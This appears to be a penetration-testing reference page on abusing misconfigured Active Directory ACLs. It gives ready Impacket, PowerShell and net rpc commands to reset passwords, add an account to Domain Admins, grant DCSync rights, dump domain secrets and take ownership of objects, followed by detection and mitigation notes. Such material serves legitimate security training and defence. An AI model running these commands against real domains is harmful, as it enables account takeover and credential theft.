ACL Abuse

Overview

Active Directory uses Access Control Lists (ACLs) to define permissions on objects. Misconfigured ACLs can allow low-privileged users to modify high-privileged objects — changing passwords, adding group members, granting DCSync rights, or taking ownership. BloodHound is the primary tool for identifying exploitable ACL paths. The key permissions to look for are GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword, and AddMember.

ATT&CK Mapping

• Tactic: TA0003 - Persistence
• Technique: T1098 - Account Manipulation

Prerequisites

• Valid domain credentials
• Exploitable ACL misconfiguration (identified via BloodHound or manual enumeration)

Techniques

Dangerous ACL Permissions

Permission	What It Allows
GenericAll	Full control — change password, modify group membership, write SPNs, etc.
GenericWrite	Write any non-protected attribute — add SPN (Kerberoast), modify logon script
WriteOwner	Take ownership of the object, then grant yourself full permissions
WriteDACL	Modify the DACL — grant yourself any permission
ForceChangePassword	Reset the user's password without knowing the current one
AddMember	Add members to a group (typically on group objects)

GenericAll on User

# Change the user's password
# Impacket
# https://github.com/fortra/impacket
impacket-changepasswd '<domain>/<target_user>:<old_password>@<dc_ip>' -newpass '<new_password>' -reset -altuser '<attacker>' -altpass '<password>'

# Or set an SPN and Kerberoast
# Targeted Kerberoasting — set SPN then extract hash
# Impacket
# https://github.com/fortra/impacket
impacket-GetUserSPNs '<domain>/<attacker>:<password>' -dc-ip <dc_ip> -request-user <target_user>

GenericAll / AddMember on Group

# Add yourself to a group (e.g., Domain Admins)
net rpc group addmem '<group>' '<user>' -U '<domain>/<attacker>%<password>' -S <dc_ip>

# PowerShell
Add-ADGroupMember -Identity "Domain Admins" -Members <attacker>

ForceChangePassword

# Impacket — change password remotely
# https://github.com/fortra/impacket
impacket-changepasswd '<domain>/<target_user>@<dc_ip>' -newpass '<new_password>' -reset -altuser '<attacker>' -altpass '<password>'

# PowerShell
Set-ADAccountPassword -Identity <target_user> -Reset -NewPassword (ConvertTo-SecureString '<new_password>' -AsPlainText -Force)

WriteDACL — Grant DCSync Rights

# Impacket — add DCSync rights to your account
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<attacker>:<password>' -action write -rights DCSync -principal '<attacker>' -target-dn 'DC=domain,DC=local' -dc-ip <dc_ip>

# Then DCSync
impacket-secretsdump '<domain>/<attacker>:<password>@<dc_ip>' -just-dc

WriteDACL — Grant GenericAll

# Impacket — grant yourself FullControl over a target
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<attacker>:<password>' -action write -rights FullControl -principal '<attacker>' -target '<target_object>' -dc-ip <dc_ip>

WriteOwner — Take Ownership

# Impacket — take ownership of an object
# https://github.com/fortra/impacket
impacket-owneredit '<domain>/<attacker>:<password>' -action write -new-owner '<attacker>' -target '<target_object>' -dc-ip <dc_ip>

# After taking ownership, grant yourself WriteDACL
impacket-dacledit '<domain>/<attacker>:<password>' -action write -rights FullControl -principal '<attacker>' -target '<target_object>' -dc-ip <dc_ip>

Read ACLs

# Impacket — read DACL on an object
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<user>:<password>' -action read -target '<target_object>' -dc-ip <dc_ip>

# Read owner
impacket-owneredit '<domain>/<user>:<password>' -action read -target '<target_object>' -dc-ip <dc_ip>

Cleanup — Remove Added ACEs

# Impacket — remove the ACE you added
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<attacker>:<password>' -action remove -rights DCSync -principal '<attacker>' -target-dn 'DC=domain,DC=local' -dc-ip <dc_ip>

Detection Methods

Network-Based Detection

• LDAP modification requests changing DACLs or ownership on sensitive objects
• Unusual LDAP write traffic from non-admin accounts

Host-Based Detection

• Windows Security Event 5136 (Directory Service Object Modified) — DACL or owner changes
• Event 4662 — access to sensitive AD object attributes
• BloodHound-detectable ACL paths from low-privileged groups to high-privileged objects

Mitigation Strategies

• Audit ACLs regularly — use BloodHound or ADExplorer to find dangerous ACL paths
• Remove unnecessary permissions — follow least privilege for AD object permissions
• Monitor DACL changes — alert on ACL modifications to sensitive objects (Domain Admins, DC objects, domain root)
• AdminSDHolder — ensure protected objects have correct SDProp permissions

References

Official Documentation

• Impacket

MITRE ATT&CK

• T1098 - Account Manipulation